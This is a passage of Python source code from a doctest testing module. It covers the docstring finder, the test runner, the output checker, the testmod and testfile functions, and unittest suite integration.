# Extract the object's docstring. If it doesn't have one,
# then return None (no test for this object).
if isinstance(obj, str):
docstring = obj
else:
try:
if obj.__doc__ is None:
docstring = ''
else:
docstring = obj.__doc__
if not isinstance(docstring, str):
docstring = str(docstring)
except (TypeError, AttributeError):
docstring = ''
# Find the docstring's location in the file.
lineno = self._find_lineno(obj, source_lines)
# Don't bother if the docstring is empty.
if self._exclude_empty and not docstring:
return None
# Return a DocTest for this object.
if module is None:
filename = None
else:
filename = getattr(module, '__file__', module.__name__)
if filename[-4:] in (".pyc", ".pyo"):
filename = filename[:-1]
elif sys.platform.startswith('java') and \
filename.endswith('$py.class'):
filename = '%s.py' % filename[:-9]
return self._parser.get_doctest(docstring, globs, name,
filename, lineno)
def _find_lineno(self, obj, source_lines):
"""
Return a line number of the given object's docstring. Note:
this method assumes that the object has a docstring.
"""
lineno = None
# Find the line number for modules.
if inspect.ismodule(obj):
lineno = 0
# Find the line number for classes.
# Note: this could be fooled if a class is defined multiple
# times in a single file.
if inspect.isclass(obj):
if source_lines is None:
return None
pat = re.compile(r'^\s*class\s*%s\b' %
getattr(obj, '__name__', '-'))
for i, line in enumerate(source_lines):
if pat.match(line):
lineno = i
break
# Find the line number for functions & methods.
if inspect.ismethod(obj): obj = obj.__func__
if inspect.isfunction(obj): obj = obj.__code__
if inspect.istraceback(obj): obj = obj.tb_frame
if inspect.isframe(obj): obj = obj.f_code
if inspect.iscode(obj):
lineno = getattr(obj, 'co_firstlineno', None)-1
# Find the line number where the docstring starts. Assume
# that it's the first line that begins with a quote mark.
# Note: this could be fooled by a multiline function
# signature, where a continuation line begins with a quote
# mark.
if lineno is not None:
if source_lines is None:
return lineno+1
            pat = re.compile(r'(^|.*:)\s*\w*("|\')')
for lineno in range(lineno, len(source_lines)):
if pat.match(source_lines[lineno]):
return lineno
# We couldn't find the line number.
return None
######################################################################
## 5. DocTest Runner
######################################################################
class DocTestRunner:
# This divider string is used to separate failure messages, and to
# separate sections of the summary.
DIVIDER = "*" * 70
def __init__(self, checker=None, verbose=None, optionflags=0):
"""
Create a new test runner.
Optional keyword arg `checker` is the `OutputChecker` that
should be used to compare the expected outputs and actual
outputs of doctest examples.
Optional keyword arg 'verbose' prints lots of stuff if true,
only failures if false; by default, it's true iff '-v' is in
sys.argv.
Optional argument `optionflags` can be used to control how the
test runner compares expected output to actual output, and how
it displays failures. See the documentation for `testmod` for
more information.
"""
self._checker = checker or OutputChecker()
if verbose is None:
verbose = '-v' in sys.argv
self._verbose = verbose
self.optionflags = optionflags
self.original_optionflags = optionflags
# Keep track of the examples we've run.
self.tries = 0
self.failures = 0
self._name2ft = {}
# Create a fake output target for capturing doctest output.
self._fakeout = _SpoofOut()
#/////////////////////////////////////////////////////////////////
# Reporting methods
#/////////////////////////////////////////////////////////////////
def report_start(self, out, test, example):
"""
Report that the test runner is about to process the given
example. (Only displays a message if verbose=True)
"""
if self._verbose:
if example.want:
out('Trying:\n' + _indent(example.source) +
'Expecting:\n' + _indent(example.want))
else:
out('Trying:\n' + _indent(example.source) +
'Expecting nothing\n')
def report_success(self, out, test, example, got):
"""
Report that the given example ran successfully. (Only
displays a message if verbose=True)
"""
if self._verbose:
out("ok\n")
def report_failure(self, out, test, example, got):
"""
Report that the given example failed.
"""
out(self._failure_header(test, example) +
self._checker.output_difference(example, got, self.optionflags))
def report_unexpected_exception(self, out, test, example, exc_info):
"""
Report that the given example raised an unexpected exception.
"""
out(self._failure_header(test, example) +
'Exception raised:\n' + _indent(_exception_traceback(exc_info)))
def _failure_header(self, test, example):
out = [self.DIVIDER]
if test.filename:
if test.lineno is not None and example.lineno is not None:
lineno = test.lineno + example.lineno + 1
else:
lineno = '?'
out.append('File "%s", line %s, in %s' %
(test.filename, lineno, test.name))
else:
out.append('Line %s, in %s' % (example.lineno+1, test.name))
out.append('Failed example:')
source = example.source
out.append(_indent(source))
return '\n'.join(out)
#/////////////////////////////////////////////////////////////////
# DocTest Running
#/////////////////////////////////////////////////////////////////
def __run(self, test, compileflags, out):
"""
Run the examples in `test`. Write the outcome of each example
with one of the `DocTestRunner.report_*` methods, using the
writer function `out`. `compileflags` is the set of compiler
flags that should be used to execute examples. Return a tuple
`(f, t)`, where `t` is the number of examples tried, and `f`
is the number of examples that failed. The examples are run
in the namespace `test.globs`.
"""
# Keep track of the number of failures and tries.
failures = tries = 0
# Save the option flags (since option directives can be used
# to modify them).
original_optionflags = self.optionflags
SUCCESS, FAILURE, BOOM = list(range(3)) # `outcome` state
check = self._checker.check_output
# Process each example.
for examplenum, example in enumerate(test.examples):
            # If REPORT_ONLY_FIRST_FAILURE is set, then suppress
# reporting after the first failure.
quiet = (self.optionflags & REPORT_ONLY_FIRST_FAILURE and
failures > 0)
# Merge in the example's options.
self.optionflags = original_optionflags
if example.options:
for (optionflag, val) in list(example.options.items()):
if val:
self.optionflags |= optionflag
else:
self.optionflags &= ~optionflag
# Record that we started this example.
tries += 1
if not quiet:
self.report_start(out, test, example)
# Use a special filename for compile(), so we can retrieve
# the source code during interactive debugging (see
# __patched_linecache_getlines).
filename = '<doctest %s[%d]>' % (test.name, examplenum)
# Run the example in the given context (globs), and record
# any exception that gets raised. (But don't intercept
# keyboard interrupts.)
try:
# Don't blink! This is where the user's code gets run.
exec(compile(example.source, filename, "single",
compileflags, 1), test.globs)
self.debugger.set_continue() # ==== Example Finished ====
exception = None
except KeyboardInterrupt:
raise
except:
exception = sys.exc_info()
self.debugger.set_continue() # ==== Example Finished ====
got = self._fakeout.getvalue() # the actual output
self._fakeout.truncate(0)
outcome = FAILURE # guilty until proved innocent or insane
# If the example executed without raising any exceptions,
# verify its output.
if exception is None:
if check(example.want, got, self.optionflags):
outcome = SUCCESS
# The example raised an exception: check if it was expected.
else:
                # In Python 3, sys.exc_info() is cleared once the except
                # clause exits, so use the tuple saved above instead.
                exc_info = exception
exc_msg = traceback.format_exception_only(*exc_info[:2])[-1]
if not quiet:
got += _exception_traceback(exc_info)
# If `example.exc_msg` is None, then we weren't expecting
# an exception.
if example.exc_msg is None:
outcome = BOOM
# We expected an exception: see whether it matches.
elif check(example.exc_msg, exc_msg, self.optionflags):
outcome = SUCCESS
# Another chance if they didn't care about the detail.
elif self.optionflags & IGNORE_EXCEPTION_DETAIL:
m1 = re.match(r'[^:]*:', example.exc_msg)
m2 = re.match(r'[^:]*:', exc_msg)
if m1 and m2 and check(m1.group(0), m2.group(0),
self.optionflags):
outcome = SUCCESS
# Report the outcome.
if outcome is SUCCESS:
if not quiet:
self.report_success(out, test, example, got)
elif outcome is FAILURE:
if not quiet:
self.report_failure(out, test, example, got)
failures += 1
elif outcome is BOOM:
if not quiet:
self.report_unexpected_exception(out, test, example,
exc_info)
failures += 1
else:
assert False, ("unknown outcome", outcome)
# Restore the option flags (in case they were modified)
self.optionflags = original_optionflags
# Record and return the number of failures and tries.
self.__record_outcome(test, failures, tries)
return failures, tries
def __record_outcome(self, test, f, t):
"""
Record the fact that the given DocTest (`test`) generated `f`
failures out of `t` tried examples.
"""
f2, t2 = self._name2ft.get(test.name, (0,0))
self._name2ft[test.name] = (f+f2, t+t2)
self.failures += f
self.tries += t
__LINECACHE_FILENAME_RE = re.compile(r'<doctest '
r'(?P<name>[\w\.]+)'
r'\[(?P<examplenum>\d+)\]>$')
def __patched_linecache_getlines(self, filename):
m = self.__LINECACHE_FILENAME_RE.match(filename)
if m and m.group('name') == self.test.name:
example = self.test.examples[int(m.group('examplenum'))]
return example.source.splitlines(True)
else:
return self.save_linecache_getlines(filename)
def run(self, test, compileflags=None, out=None, clear_globs=True):
"""
Run the examples in `test`, and display the results using the
writer function `out`.
The examples are run in the namespace `test.globs`. If
`clear_globs` is true (the default), then this namespace will
be cleared after the test runs, to help with garbage
collection. If you would like to examine the namespace after
the test completes, then use `clear_globs=False`.
`compileflags` gives the set of flags that should be used by
the Python compiler when running the examples. If not
specified, then it will default to the set of future-import
flags that apply to `globs`.
The output of each example is checked using
`DocTestRunner.check_output`, and the results are formatted by
the `DocTestRunner.report_*` methods.
"""
self.test = test
if compileflags is None:
compileflags = _extract_future_flags(test.globs)
save_stdout = sys.stdout
if out is None:
out = save_stdout.write
sys.stdout = self._fakeout
# Patch pdb.set_trace to restore sys.stdout during interactive
# debugging (so it's not still redirected to self._fakeout).
# Note that the interactive output will go to *our*
# save_stdout, even if that's not the real sys.stdout; this
# allows us to write test cases for the set_trace behavior.
save_set_trace = pdb.set_trace
self.debugger = _OutputRedirectingPdb(save_stdout)
self.debugger.reset()
pdb.set_trace = self.debugger.set_trace
# Patch linecache.getlines, so we can see the example's source
# when we're inside the debugger.
self.save_linecache_getlines = linecache.getlines
linecache.getlines = self.__patched_linecache_getlines
try:
return self.__run(test, compileflags, out)
finally:
sys.stdout = save_stdout
pdb.set_trace = save_set_trace
linecache.getlines = self.save_linecache_getlines
if clear_globs:
test.globs.clear()
#/////////////////////////////////////////////////////////////////
# Summarization
#/////////////////////////////////////////////////////////////////
def summarize(self, verbose=None):
"""
Print a summary of all the test cases that have been run by
this DocTestRunner, and return a tuple `(f, t)`, where `f` is
the total number of failed examples, and `t` is the total
number of tried examples.
The optional `verbose` argument controls how detailed the
summary is. If the verbosity is not specified, then the
DocTestRunner's verbosity is used.
"""
if verbose is None:
verbose = self._verbose
notests = []
passed = []
failed = []
totalt = totalf = 0
for x in list(self._name2ft.items()):
name, (f, t) = x
assert f <= t
totalt += t
totalf += f
if t == 0:
notests.append(name)
elif f == 0:
passed.append( (name, t) )
else:
failed.append(x)
if verbose:
if notests:
print(len(notests), "items had no tests:")
notests.sort()
for thing in notests:
print(" ", thing)
if passed:
print(len(passed), "items passed all tests:")
passed.sort()
for thing, count in passed:
print(" %3d tests in %s" % (count, thing))
if failed:
print(self.DIVIDER)
print(len(failed), "items had failures:")
failed.sort()
for thing, (f, t) in failed:
print(" %3d of %3d in %s" % (f, t, thing))
if verbose:
print(totalt, "tests in", len(self._name2ft), "items.")
print(totalt - totalf, "passed and", totalf, "failed.")
if totalf:
print("***Test Failed***", totalf, "failures.")
elif verbose:
print("Test passed.")
return totalf, totalt
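    # Illustrative sketch (not part of the original module): wiring the
    # parser and runner together by hand.
    #
    #     >>> test = DocTestParser().get_doctest('>>> 2 + 2\n4\n',
    #     ...                                    {}, 'demo', None, 0)
    #     >>> runner = DocTestRunner(verbose=False)
    #     >>> runner.run(test)
    #     (0, 1)
    #     >>> runner.summarize()
    #     (0, 1)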
#/////////////////////////////////////////////////////////////////
# Backward compatibility cruft to maintain doctest.master.
#/////////////////////////////////////////////////////////////////
def merge(self, other):
d = self._name2ft
for name, (f, t) in list(other._name2ft.items()):
if name in d:
print("*** DocTestRunner.merge: '" + name + "' in both" \
" testers; summing outcomes.")
f2, t2 = d[name]
f = f + f2
t = t + t2
d[name] = f, t
class OutputChecker:
"""
    A class used to check whether the actual output from a doctest
example matches the expected output. `OutputChecker` defines two
methods: `check_output`, which compares a given pair of outputs,
and returns true if they match; and `output_difference`, which
returns a string describing the differences between two outputs.
"""
def check_output(self, want, got, optionflags):
"""
Return True iff the actual output from an example (`got`)
matches the expected output (`want`). These strings are
always considered to match if they are identical; but
depending on what option flags the test runner is using,
several non-exact match types are also possible. See the
documentation for `TestRunner` for more information about
option flags.
"""
# Handle the common case first, for efficiency:
# if they're string-identical, always return true.
if got == want:
return True
# The values True and False replaced 1 and 0 as the return
# value for boolean comparisons in Python 2.3.
if not (optionflags & DONT_ACCEPT_TRUE_FOR_1):
if (got,want) == ("True\n", "1\n"):
return True
if (got,want) == ("False\n", "0\n"):
return True
# <BLANKLINE> can be used as a special sequence to signify a
# blank line, unless the DONT_ACCEPT_BLANKLINE flag is used.
if not (optionflags & DONT_ACCEPT_BLANKLINE):
# Replace <BLANKLINE> in want with a blank line.
            want = re.sub(r'(?m)^%s\s*?$' % re.escape(BLANKLINE_MARKER),
                          '', want)
# If a line in got contains only spaces, then remove the
# spaces.
            got = re.sub(r'(?m)^\s*?$', '', got)
if got == want:
return True
# This flag causes doctest to ignore any differences in the
# contents of whitespace strings. Note that this can be used
# in conjunction with the ELLIPSIS flag.
if optionflags & NORMALIZE_WHITESPACE:
got = ' '.join(got.split())
want = ' '.join(want.split())
if got == want:
return True
# The ELLIPSIS flag says to let the sequence "..." in `want`
# match any substring in `got`.
if optionflags & ELLIPSIS:
if _ellipsis_match(want, got):
return True
# We didn't find any match; return false.
return False
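    # Illustrative sketch (not part of the original module): how two of the
    # comparison flags change the verdict.
    #
    #     >>> checker = OutputChecker()
    #     >>> checker.check_output('1  2\n', '1 2\n', 0)
    #     False
    #     >>> checker.check_output('1  2\n', '1 2\n', NORMALIZE_WHITESPACE)
    #     True
    #     >>> checker.check_output('a...z\n', 'abcxyz\n', ELLIPSIS)
    #     True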
# Should we do a fancy diff?
def _do_a_fancy_diff(self, want, got, optionflags):
# Not unless they asked for a fancy diff.
if not optionflags & (REPORT_UDIFF |
REPORT_CDIFF |
REPORT_NDIFF):
return False
# If expected output uses ellipsis, a meaningful fancy diff is
# too hard ... or maybe not. In two real-life failures Tim saw,
# a diff was a major help anyway, so this is commented out.
# [todo] _ellipsis_match() knows which pieces do and don't match,
# and could be the basis for a kick-ass diff in this case.
##if optionflags & ELLIPSIS and ELLIPSIS_MARKER in want:
## return False
# ndiff does intraline difference marking, so can be useful even
# for 1-line differences.
if optionflags & REPORT_NDIFF:
return True
# The other diff types need at least a few lines to be helpful.
return want.count('\n') > 2 and got.count('\n') > 2
def output_difference(self, example, got, optionflags):
"""
Return a string describing the differences between the
expected output for a given example (`example`) and the actual
output (`got`). `optionflags` is the set of option flags used
to compare `want` and `got`.
"""
want = example.want
# If <BLANKLINE>s are being used, then replace blank lines
# with <BLANKLINE> in the actual output string.
if not (optionflags & DONT_ACCEPT_BLANKLINE):
            got = re.sub(r'(?m)^[ ]*(?=\n)', BLANKLINE_MARKER, got)
# Check if we should use diff.
if self._do_a_fancy_diff(want, got, optionflags):
# Split want & got into lines.
want_lines = want.splitlines(True) # True == keep line ends
got_lines = got.splitlines(True)
# Use difflib to find their differences.
if optionflags & REPORT_UDIFF:
diff = difflib.unified_diff(want_lines, got_lines, n=2)
diff = list(diff)[2:] # strip the diff header
kind = 'unified diff with -expected +actual'
elif optionflags & REPORT_CDIFF:
diff = difflib.context_diff(want_lines, got_lines, n=2)
diff = list(diff)[2:] # strip the diff header
kind = 'context diff with expected followed by actual'
elif optionflags & REPORT_NDIFF:
engine = difflib.Differ(charjunk=difflib.IS_CHARACTER_JUNK)
diff = list(engine.compare(want_lines, got_lines))
kind = 'ndiff with -expected +actual'
else:
assert 0, 'Bad diff option'
# Remove trailing whitespace on diff output.
diff = [line.rstrip() + '\n' for line in diff]
return 'Differences (%s):\n' % kind + _indent(''.join(diff))
# If we're not using diff, then simply list the expected
# output followed by the actual output.
if want and got:
return 'Expected:\n%sGot:\n%s' % (_indent(want), _indent(got))
elif want:
return 'Expected:\n%sGot nothing\n' % _indent(want)
elif got:
return 'Expected nothing\nGot:\n%s' % _indent(got)
else:
return 'Expected nothing\nGot nothing\n'
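# Illustrative sketch (not part of the original module): with no diff flags
# set, output_difference() simply lists both outputs, indented.
#
#     >>> ex = Example('print(x)', 'expected\n')
#     >>> OutputChecker().output_difference(ex, 'actual\n', 0)
#     'Expected:\n    expected\nGot:\n    actual\n'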
class DocTestFailure(Exception):
"""A DocTest example has failed in debugging mode.
The exception instance has variables:
- test: the DocTest object being run
    - example: the Example object that failed
- got: the actual output
"""
def __init__(self, test, example, got):
self.test = test
self.example = example
self.got = got
def __str__(self):
return str(self.test)
class UnexpectedException(Exception):
"""A DocTest example has encountered an unexpected exception
The exception instance has variables:
- test: the DocTest object being run
    - example: the Example object that failed
- exc_info: the exception info
"""
def __init__(self, test, example, exc_info):
self.test = test
self.example = example
self.exc_info = exc_info
def __str__(self):
return str(self.test)
class DebugRunner(DocTestRunner):
def run(self, test, compileflags=None, out=None, clear_globs=True):
r = DocTestRunner.run(self, test, compileflags, out, False)
if clear_globs:
test.globs.clear()
return r
def report_unexpected_exception(self, out, test, example, exc_info):
raise UnexpectedException(test, example, exc_info)
def report_failure(self, out, test, example, got):
raise DocTestFailure(test, example, got)
######################################################################
## 6. Test Functions
######################################################################
# These should be backwards compatible.
# For backward compatibility, a global instance of a DocTestRunner
# class, updated by testmod.
master = None
def testmod(m=None, name=None, globs=None, verbose=None, isprivate=None,
report=True, optionflags=0, extraglobs=None,
raise_on_error=False, exclude_empty=False):
"""m=None, name=None, globs=None, verbose=None, isprivate=None,
report=True, optionflags=0, extraglobs=None, raise_on_error=False,
exclude_empty=False
Test examples in docstrings in functions and classes reachable
from module m (or the current module if m is not supplied), starting
with m.__doc__. Unless isprivate is specified, private names
are not skipped.
Also test examples reachable from dict m.__test__ if it exists and is
not None. m.__test__ maps names to functions, classes and strings;
function and class docstrings are tested even if the name is private;
strings are tested directly, as if they were docstrings.
Return (#failures, #tests).
See doctest.__doc__ for an overview.
Optional keyword arg "name" gives the name of the module; by default
use m.__name__.
Optional keyword arg "globs" gives a dict to be used as the globals
when executing examples; by default, use m.__dict__. A copy of this
dict is actually used for each docstring, so that each docstring's
examples start with a clean slate.
Optional keyword arg "extraglobs" gives a dictionary that should be
merged into the globals that are used to execute examples. By
default, no extra globals are used. This is new in 2.4.
Optional keyword arg "verbose" prints lots of stuff if true, prints
only failures if false; by default, it's true iff "-v" is in sys.argv.
Optional keyword arg "report" prints a summary at the end when true,
else prints nothing at the end. In verbose mode, the summary is
detailed, else very brief (in fact, empty if all tests passed).
Optional keyword arg "optionflags" or's together module constants,
and defaults to 0. This is new in 2.3. Possible values (see the
docs for details):
DONT_ACCEPT_TRUE_FOR_1
DONT_ACCEPT_BLANKLINE
NORMALIZE_WHITESPACE
ELLIPSIS
IGNORE_EXCEPTION_DETAIL
REPORT_UDIFF
REPORT_CDIFF
REPORT_NDIFF
REPORT_ONLY_FIRST_FAILURE
Optional keyword arg "raise_on_error" raises an exception on the
first unexpected exception or failure. This allows failures to be
post-mortem debugged.
Deprecated in Python 2.4:
Optional keyword arg "isprivate" specifies a function used to
determine whether a name is private. The default function is
    to treat all functions as public. Optionally, "isprivate" can be
set to doctest.is_private to skip over functions marked as private
using the underscore naming convention; see its docs for details.
Advanced tomfoolery: testmod runs methods of a local instance of
class doctest.Tester, then merges the results into (or creates)
global Tester instance doctest.master. Methods of doctest.master
can be called directly too, if you want to do something unusual.
Passing report=0 to testmod is especially useful then, to delay
displaying a summary. Invoke doctest.master.summarize(verbose)
when you're done fiddling.
"""
global master
if isprivate is not None:
warnings.warn("the isprivate argument is deprecated; "
"examine DocTestFinder.find() lists instead",
DeprecationWarning)
# If no module was given, then use __main__.
if m is None:
# DWA - m will still be None if this wasn't invoked from the command
# line, in which case the following TypeError is about as good an error
# as we should expect
m = sys.modules.get('__main__')
# Check that we were actually given a module.
if not inspect.ismodule(m):
raise TypeError("testmod: module required; %r" % (m,))
# If no name was given, then use the module's name.
if name is None:
name = m.__name__
# Find, parse, and run all tests in the given module.
finder = DocTestFinder(_namefilter=isprivate, exclude_empty=exclude_empty)
if raise_on_error:
runner = DebugRunner(verbose=verbose, optionflags=optionflags)
else:
runner = DocTestRunner(verbose=verbose, optionflags=optionflags)
for test in finder.find(m, name, globs=globs, extraglobs=extraglobs):
runner.run(test)
if report:
runner.summarize()
if master is None:
master = runner
else:
master.merge(runner)
return runner.failures, runner.tries
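# Illustrative sketch (not part of the original module): typical testmod()
# use on an already-imported module; `mymodule` is hypothetical.
#
#     >>> import mymodule                      # hypothetical
#     >>> failures, tried = testmod(mymodule, verbose=False,
#     ...                           optionflags=ELLIPSIS)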
def testfile(filename, module_relative=True, name=None, package=None,
globs=None, verbose=None, report=True, optionflags=0,
extraglobs=None, raise_on_error=False, parser=DocTestParser()):
"""
Test examples in the given file. Return (#failures, #tests).
Optional keyword arg "module_relative" specifies how filenames
should be interpreted:
- If "module_relative" is True (the default), then "filename"
specifies a module-relative path. By default, this path is
relative to the calling module's directory; but if the
"package" argument is specified, then it is relative to that
package. To ensure os-independence, "filename" should use
"/" characters to separate path segments, and should not
be an absolute path (i.e., it may not begin with "/").
- If "module_relative" is False, then "filename" specifies an
os-specific path. The path may be absolute or relative (to
the current working directory).
Optional keyword arg "name" gives the name of the test; by default
use the file's basename.
Optional keyword argument "package" is a Python package or the
name of a Python package whose directory should be used as the
base directory for a module relative filename. If no package is
specified, then the calling module's directory is used as the base
directory for module relative filenames. It is an error to
specify "package" if "module_relative" is False.
Optional keyword arg "globs" gives a dict to be used as the globals
when executing examples; by default, use {}. A copy of this dict
is actually used for each docstring, so that each docstring's
examples start with a clean slate.
Optional keyword arg "extraglobs" gives a dictionary that should be
merged into the globals that are used to execute examples. By
default, no extra globals are used.
Optional keyword arg "verbose" prints lots of stuff if true, prints
only failures if false; by default, it's true iff "-v" is in sys.argv.
Optional keyword arg "report" prints a summary at the end when true,
else prints nothing at the end. In verbose mode, the summary is
detailed, else very brief (in fact, empty if all tests passed).
Optional keyword arg "optionflags" or's together module constants,
and defaults to 0. Possible values (see the docs for details):
DONT_ACCEPT_TRUE_FOR_1
DONT_ACCEPT_BLANKLINE
NORMALIZE_WHITESPACE
ELLIPSIS
IGNORE_EXCEPTION_DETAIL
REPORT_UDIFF
REPORT_CDIFF
REPORT_NDIFF
REPORT_ONLY_FIRST_FAILURE
Optional keyword arg "raise_on_error" raises an exception on the
first unexpected exception or failure. This allows failures to be
post-mortem debugged.
Optional keyword arg "parser" specifies a DocTestParser (or
subclass) that should be used to extract tests from the files.
Advanced tomfoolery: testmod runs methods of a local instance of
class doctest.Tester, then merges the results into (or creates)
global Tester instance doctest.master. Methods of doctest.master
can be called directly too, if you want to do something unusual.
Passing report=0 to testmod is especially useful then, to delay
displaying a summary. Invoke doctest.master.summarize(verbose)
when you're done fiddling.
"""
global master
if package and not module_relative:
raise ValueError("Package may only be specified for module-"
"relative paths.")
# Relativize the path
if module_relative:
package = _normalize_module(package)
filename = _module_relative_path(package, filename)
# If no name was given, then use the file's name.
if name is None:
name = os.path.basename(filename)
# Assemble the globals.
if globs is None:
globs = {}
else:
globs = globs.copy()
if extraglobs is not None:
globs.update(extraglobs)
if raise_on_error:
runner = DebugRunner(verbose=verbose, optionflags=optionflags)
else:
runner = DocTestRunner(verbose=verbose, optionflags=optionflags)
# Read the file, convert it to a test, and run it.
s = open(filename).read()
test = parser.get_doctest(s, globs, name, filename, 0)
runner.run(test)
if report:
runner.summarize()
if master is None:
master = runner
else:
master.merge(runner)
return runner.failures, runner.tries
def run_docstring_examples(f, globs, verbose=False, name="NoName",
compileflags=None, optionflags=0):
"""
Test examples in the given object's docstring (`f`), using `globs`
as globals. Optional argument `name` is used in failure messages.
If the optional argument `verbose` is true, then generate output
even if there are no failures.
`compileflags` gives the set of flags that should be used by the
Python compiler when running the examples. If not specified, then
it will default to the set of future-import flags that apply to
`globs`.
Optional keyword arg `optionflags` specifies options for the
testing and output. See the documentation for `testmod` for more
information.
"""
# Find, parse, and run all tests in the given module.
finder = DocTestFinder(verbose=verbose, recurse=False)
runner = DocTestRunner(verbose=verbose, optionflags=optionflags)
for test in finder.find(f, name, globs=globs):
runner.run(test, compileflags=compileflags)
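# A minimal sketch of run_docstring_examples() applied to a single object
# (the function `square` below is hypothetical):
#
#     def square(x):
#         """
#         >>> square(3)
#         9
#         """
#         return x * x
#
#     run_docstring_examples(square, globs={'square': square}, name='square')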
######################################################################
## 7. Tester
######################################################################
# This is provided only for backwards compatibility. It's not
# actually used in any way.
class Tester:
def __init__(self, mod=None, globs=None, verbose=None,
isprivate=None, optionflags=0):
warnings.warn("class Tester is deprecated; "
"use class doctest.DocTestRunner instead",
DeprecationWarning, stacklevel=2)
if mod is None and globs is None:
raise TypeError("Tester.__init__: must specify mod or globs")
if mod is not None and not inspect.ismodule(mod):
raise TypeError("Tester.__init__: mod must be a module; %r" %
(mod,))
if globs is None:
globs = mod.__dict__
self.globs = globs
self.verbose = verbose
self.isprivate = isprivate
self.optionflags = optionflags
self.testfinder = DocTestFinder(_namefilter=isprivate)
self.testrunner = DocTestRunner(verbose=verbose,
optionflags=optionflags)
def runstring(self, s, name):
test = DocTestParser().get_doctest(s, self.globs, name, None, None)
if self.verbose:
print("Running string", name)
(f,t) = self.testrunner.run(test)
if self.verbose:
print(f, "of", t, "examples failed in string", name)
return (f,t)
def rundoc(self, object, name=None, module=None):
f = t = 0
tests = self.testfinder.find(object, name, module=module,
globs=self.globs)
for test in tests:
(f2, t2) = self.testrunner.run(test)
(f,t) = (f+f2, t+t2)
return (f,t)
def rundict(self, d, name, module=None):
import new
m = new.module(name)
m.__dict__.update(d)
if module is None:
module = False
return self.rundoc(m, name, module)
def run__test__(self, d, name):
import new
m = new.module(name)
m.__test__ = d
return self.rundoc(m, name)
def summarize(self, verbose=None):
return self.testrunner.summarize(verbose)
def merge(self, other):
self.testrunner.merge(other.testrunner)
######################################################################
## 8. Unittest Support
######################################################################
_unittest_reportflags = 0
def set_unittest_reportflags(flags):
global _unittest_reportflags
if (flags & REPORTING_FLAGS) != flags:
raise ValueError("Only reporting flags allowed", flags)
old = _unittest_reportflags
_unittest_reportflags = flags
return old
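# Illustrative sketch: make unittest-driven doctests report failures as
# unified diffs, unless a DocTestCase carries its own reporting flags:
#
#     old_flags = set_unittest_reportflags(REPORT_UDIFF)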
class DocTestCase(unittest.TestCase):
def __init__(self, test, optionflags=0, setUp=None, tearDown=None,
checker=None):
unittest.TestCase.__init__(self)
self._dt_optionflags = optionflags
self._dt_checker = checker
self._dt_test = test
self._dt_setUp = setUp
self._dt_tearDown = tearDown
def setUp(self):
test = self._dt_test
if self._dt_setUp is not None:
self._dt_setUp(test)
def tearDown(self):
test = self._dt_test
if self._dt_tearDown is not None:
self._dt_tearDown(test)
test.globs.clear()
def runTest(self):
test = self._dt_test
old = sys.stdout
new = StringIO()
optionflags = self._dt_optionflags
if not (optionflags & REPORTING_FLAGS):
# The option flags don't include any reporting flags,
# so add the default reporting flags
optionflags |= _unittest_reportflags
runner = DocTestRunner(optionflags=optionflags,
checker=self._dt_checker, verbose=False)
try:
runner.DIVIDER = "-"*70
failures, tries = runner.run(
test, out=new.write, clear_globs=False)
finally:
sys.stdout = old
if failures:
raise self.failureException(self.format_failure(new.getvalue()))
def format_failure(self, err):
test = self._dt_test
if test.lineno is None:
lineno = 'unknown line number'
else:
lineno = '%s' % test.lineno
lname = '.'.join(test.name.split('.')[-1:])
return ('Failed doctest test for %s\n'
' File "%s", line %s, in %s\n\n%s'
% (test.name, test.filename, lineno, lname, err)
)
def debug(self):
self.setUp()
runner = DebugRunner(optionflags=self._dt_optionflags,
checker=self._dt_checker, verbose=False)
runner.run(self._dt_test)
self.tearDown()
def id(self):
return self._dt_test.name
def __repr__(self):
name = self._dt_test.name.split('.')
return "%s (%s)" % (name[-1], '.'.join(name[:-1]))
__str__ = __repr__
def shortDescription(self):
return "Doctest: " + self._dt_test.name
def DocTestSuite(module=None, globs=None, extraglobs=None, test_finder=None,
**options):
"""
Convert doctest tests for a module to a unittest test suite.
This converts each documentation string in a module that
contains doctest tests to a unittest test case. If any of the
tests in a doc string fail, then the test case fails. An exception
is raised showing the name of the file containing the test and a
(sometimes approximate) line number.
The `module` argument provides the module to be tested. The argument
can be either a module or a module name.
If no argument is given, the calling module is used.
A number of options may be provided as keyword arguments:
setUp
A set-up function. This is called before running the
tests in each file. The setUp function will be passed a DocTest
object. The setUp function can access the test globals as the
globs attribute of the test passed.
tearDown
A tear-down function. This is called after running the
tests in each file. The tearDown function will be passed a DocTest
object. The tearDown function can access the test globals as the
globs attribute of the test passed.
globs
A dictionary containing initial global variables for the tests.
optionflags
A set of doctest option flags expressed as an integer.
"""
if test_finder is None:
test_finder = DocTestFinder()
module = _normalize_module(module)
tests = test_finder.find(module, globs=globs, extraglobs=extraglobs)
if globs is None:
globs = module.__dict__
if not tests:
# Why do we want to do this? Because it reveals a bug that might
# otherwise be hidden.
raise ValueError(module, "has no tests")
tests.sort()
suite = unittest.TestSuite()
for test in tests:
if len(test.examples) == 0:
continue
if not test.filename:
filename = module.__file__
if filename[-4:] in (".pyc", ".pyo"):
filename = filename[:-1]
elif sys.platform.startswith('java') and \
filename.endswith('$py.class'):
filename = '%s.py' % filename[:-9]
test.filename = filename
suite.addTest(DocTestCase(test, **options))
return suite
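# A minimal sketch wiring DocTestSuite into unittest's load_tests protocol
# (the module name `my_module` is hypothetical):
#
#     import unittest, doctest, my_module
#
#     def load_tests(loader, tests, ignore):
#         tests.addTests(doctest.DocTestSuite(my_module))
#         return tests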
class DocFileCase(DocTestCase):
def id(self):
return '_'.join(self._dt_test.name.split('.'))
def __repr__(self):
return self._dt_test.filename
__str__ = __repr__
def format_failure(self, err):
return ('Failed doctest test for %s\n File "%s", line 0\n\n%s'
% (self._dt_test.name, self._dt_test.filename, err)
)
def DocFileTest(path, module_relative=True, package=None,
globs=None, parser=DocTestParser(), **options):
if globs is None:
globs = {}
if package and not module_relative:
raise ValueError("Package may only be specified for module-"
"relative paths.")
# Relativize the path.
if module_relative:
package = _normalize_module(package)
path = _module_relative_path(package, path)
# Find the file and read it.
name = os.path.basename(path)
doc = open(path).read()
# Convert it to a test, and wrap it in a DocFileCase.
test = parser.get_doctest(doc, globs, name, path, 0)
return DocFileCase(test, **options)
def DocFileSuite(*paths, **kw):
"""A unittest suite for one or more doctest files.
The path to each doctest file is given as a string; the
interpretation of that string depends on the keyword argument
"module_relative".
A number of options may be provided as keyword arguments:
module_relative
If "module_relative" is True, then the given file paths are
interpreted as os-independent module-relative paths. By
default, these paths are relative to the calling module's
directory; but if the "package" argument is specified, then
they are relative to that package. To ensure os-independence,
"filename" should use "/" characters to separate path
